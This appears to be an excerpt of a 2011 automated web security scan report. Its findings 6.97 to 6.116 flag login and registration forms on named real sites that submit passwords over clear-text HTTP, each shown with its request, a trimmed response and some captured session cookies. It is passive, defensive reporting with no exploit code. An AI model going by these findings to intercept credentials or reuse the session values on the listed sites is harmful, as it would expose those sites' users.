Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-saugumas.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.97. http://www.lithuanianjoomla.com/joomla-versijos.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-versijos.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/joomla-versijos.html

The form contains the following password field:

password

Request

GET /joomla-versijos.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:29 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-versijos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.98. http://www.lithuanianjoomla.com/kaip-idiegti-joomla.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/kaip-idiegti-joomla.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/kaip-idiegti-joomla.html

The form contains the following password field:

password

Request

GET /kaip-idiegti-joomla.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:11 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/kaip-idiegti-joomla.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.99. http://www.lithuanianjoomla.com/kontaktai.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/kontaktai.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/kontaktai.html

The form contains the following password field:

password

Request

GET /kontaktai.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 17140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/kontaktai.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.100. http://www.lithuanianjoomla.com/lithuanianjoomlacom-misija.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/lithuanianjoomlacom-misija.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/lithuanianjoomlacom-misija.html

The form contains the following password field:

password

Request

GET /lithuanianjoomlacom-misija.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/lithuanianjoomlacom-misija.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.101. http://www.lithuanianjoomla.com/lithuanianjoomlacom-vizija.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/lithuanianjoomlacom-vizija.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/lithuanianjoomlacom-vizija.html

The form contains the following password field:

password

Request

GET /lithuanianjoomlacom-vizija.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/lithuanianjoomlacom-vizija.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.102. http://www.lithuanianjoomla.com/naujienos.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/naujienos.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/naujienos.html

The form contains the following password field:

password

Request

GET /naujienos.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:49 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.103. http://www.lithuanianjoomla.com/saugi-joomla.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/saugi-joomla.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/saugi-joomla.html

The form contains the following password field:

password

Request

GET /saugi-joomla.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:05 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/saugi-joomla.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.104. http://www.lithuanianjoomla.com/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/saugi-joomla.html

The form contains the following password field:

password

Request

GET /saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:14 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/saugi-joomla.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.105. http://www.livejournal.com/update.bml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.livejournal.com
Path:	/update.bml

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.livejournal.com/update.bml

The form contains the following password field:

password

Request

GET /update.bml HTTP/1.1
Host: www.livejournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 04:43:03 GMT
Server: Apache/2.2.3 (CentOS)
X-AWS-Id: ws33
Set-Cookie: ljuniq=qSLA0OACBpHpEQx:1295930583:pgstats0:m0; expires=Saturday, 26-Mar-2011 04:43:03 GMT; domain=.livejournal.com; path=/
X-XSS-Protection: 0
Cache-Control: private, proxy-revalidate
ETag: "0d1717ff7e20cf2aa2b1705c6fb92344"
Content-length: 48142
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...
<td>

<form method='post' action='update.bml' id='updateForm' name='updateForm'>

<input type='hidden' name="lj_form_auth" value="c0:1295928000:2583:86400:DlmOeXnxss-0-qSLA0OACBpHpEQx:c0046ca7a6b3fea22aa5ddf3a408ecca" />
...[SNIP]...
</label>
<input type="password" maxlength="30" tabindex="6" name="password" class="text" id="altlogin_password" size="15" />
</p>
...[SNIP]...

6.106. http://www.nbc.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nbc.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.nbc.com/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.nbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.10
Wirt: qw-p-web17.qwplatform.com
Content-Type: text/html
Cache-Control: max-age=40
Expires: Tue, 25 Jan 2011 04:47:46 GMT
Date: Tue, 25 Jan 2011 04:47:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak-mobile-true=no; expires=Wed, 26-Jan-2011 04:47:06 GMT; path=/
Vary: User-Agent
Content-Length: 131845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<div id="mynbcLoginForm">
                   <form action="#" method="post">
                   <input type="text" name="email" value="email" title="email" tabindex="1" id="globalLoginEmail"/>
                       <input type="password" class="no-margin" name="password" value="password" title="password" tabindex="2" id="globalLoginPass"/>

                       <a id="globalLoginSubmitBtn" href="javascript:void(0);" title="Submit" tabindex="3">
...[SNIP]...

6.107. http://www.netlingo.com/login.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.netlingo.com/login-action.php

The form contains the following password field:

password

Request

GET /login.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=p2kggg0b9m3bnq9c57hhsvlcl0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div id="form" class="left">
<form name="login" id="login" action="login-action.php" method="post">
<span class="label">
...[SNIP]...
</span> <input type="password" name="password" id="password" class="inputBoxLarge" /><br />
...[SNIP]...

6.108. http://www.netlingo.com/register-premium.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/register-premium.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.netlingo.com/register-premium.php

The form contains the following password fields:

password
password2

Request

GET /register-premium.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 56600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div id="form" class="left">
<form name="register" id="register" onSubmit="return false;" method="post">
<span class="label">
...[SNIP]...
</span> <input type="password" name="password" id="password" class="inputBoxLarge" /><br />
...[SNIP]...
</span> <input type="password" name="password2" id="password2" class="inputBoxLarge" /><br />
...[SNIP]...

6.109. http://www.netlingo.com/register.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/register.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.netlingo.com/register.php

The form contains the following password fields:

password
password2

Request

GET /register.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=sb796kqmjk5b811eau65ljq195; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 46577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div id="form" class="left">
<form name="register" id="register" onsubmit="return false;" method="post">
<span class="label">
...[SNIP]...
</span> <input type="password" name="password" id="password" class="inputBoxLarge" /><br />
...[SNIP]...
</span> <input type="password" name="password2" id="password2" class="inputBoxLarge" /><br />
...[SNIP]...

6.110. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html

The form contains the following password field:

upass

Request

GET /news/2010/100710-ebay-deploys-joomla-for-analytics.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.111. http://www.noreastermagazine.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.noreastermagazine.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.noreastermagazine.com/index.php

The form contains the following password field:

passwd

Request

GET / HTTP/1.1
Host: www.noreastermagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: 7f17775ebaca27b049989f22de967fcd=8770a74d6eac2afa63076869bfca0779; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:08:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5572
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
</p>
       <form action="index.php" method="post" name="login" id="form-login">
   <fieldset class="input">
...[SNIP]...
<br />
           <input type="password" name="passwd" class="inputbox" size="18" alt="Password" id="passwd" />
       </p>
...[SNIP]...

6.112. http://www.paperg.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.paperg.com/

The form contains the following password field:

pass

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:04:37 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 10755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...

6.113. http://www.playshakespeare.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.playshakespeare.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.playshakespeare.com/index.php

The form contains the following password field:

passwd

Request

GET / HTTP/1.1
Host: www.playshakespeare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: eab80364d83027bfc601e73262603d25=341187f485832c9a1355235ffc880801; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:14 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 180908

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns=
...[SNIP]...
<div id="form-login-area">
                               <form action="/index.php" method="post" name="login" id="form-login" >
                               <fieldset class="input">
...[SNIP]...
<br />
                   <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
               </p>
...[SNIP]...

6.114. http://www.regattaregatta.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.regattaregatta.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.regattaregatta.com/index.php/component/user/?task=login

The form contains the following password field:

passwd

Request

GET / HTTP/1.1
Host: www.regattaregatta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:28:38 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: 9d1da0e50aa9b6d723bb7d2254c4deb6=e77aa027edf65e1c9fc004520497c394; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: currentURI=http%3A%2F%2Fwww.regattaregatta.com%2Findex.php; expires=Wed, 26-Jan-2011 02:28:38 GMT; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 02:28:38 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<div class="hellomid">
               <form action="/index.php/component/user/?task=login" method="post" name="form-login" id="form-login" >
                                       <fieldset class="input">
...[SNIP]...
<br />
                           <input type="password" name="passwd" id="passwd" class="inputbox" size="18" alt="password" />
                       </label>
...[SNIP]...

6.115. http://www.rockettheme.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rockettheme.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.rockettheme.com/index.php

The form contains the following password field:

passwd

Request

GET / HTTP/1.1
Host: www.rockettheme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:10 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: cd6974ce18b02e32626c9ea04659f148=eec83c2a8abb5457a4ec33e10c194c24; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:01:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>

...[SNIP]...
<div id="rokclub-login" class="login">
<form action="/index.php" method="post" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.116. http://www.shape.com/workouts/articles/blood_sugar.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/blood_sugar.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.shape.com/kickapps/public/ajax-login

The form contains the following password field:

password

Request

GET /workouts/articles/blood_sugar.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Apache
Cache-Control: max-age=900
Location: http://www.shape.com/workouts/articles/blood-sugar.html
X-Server-Name: (null)
ETag: "1295922530"
Last-Modified: Tue, 25 Jan 2011 02:28:50 +0000
X-Powered-By: PHP/5.2.13
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:43:49 GMT
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close
Content-Length: 27234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<div class="upper_login_not_logged" style="display: none;">
<form action="/kickapps/public/ajax-login" method="POST">
<table border="0">
...[SNIP]...
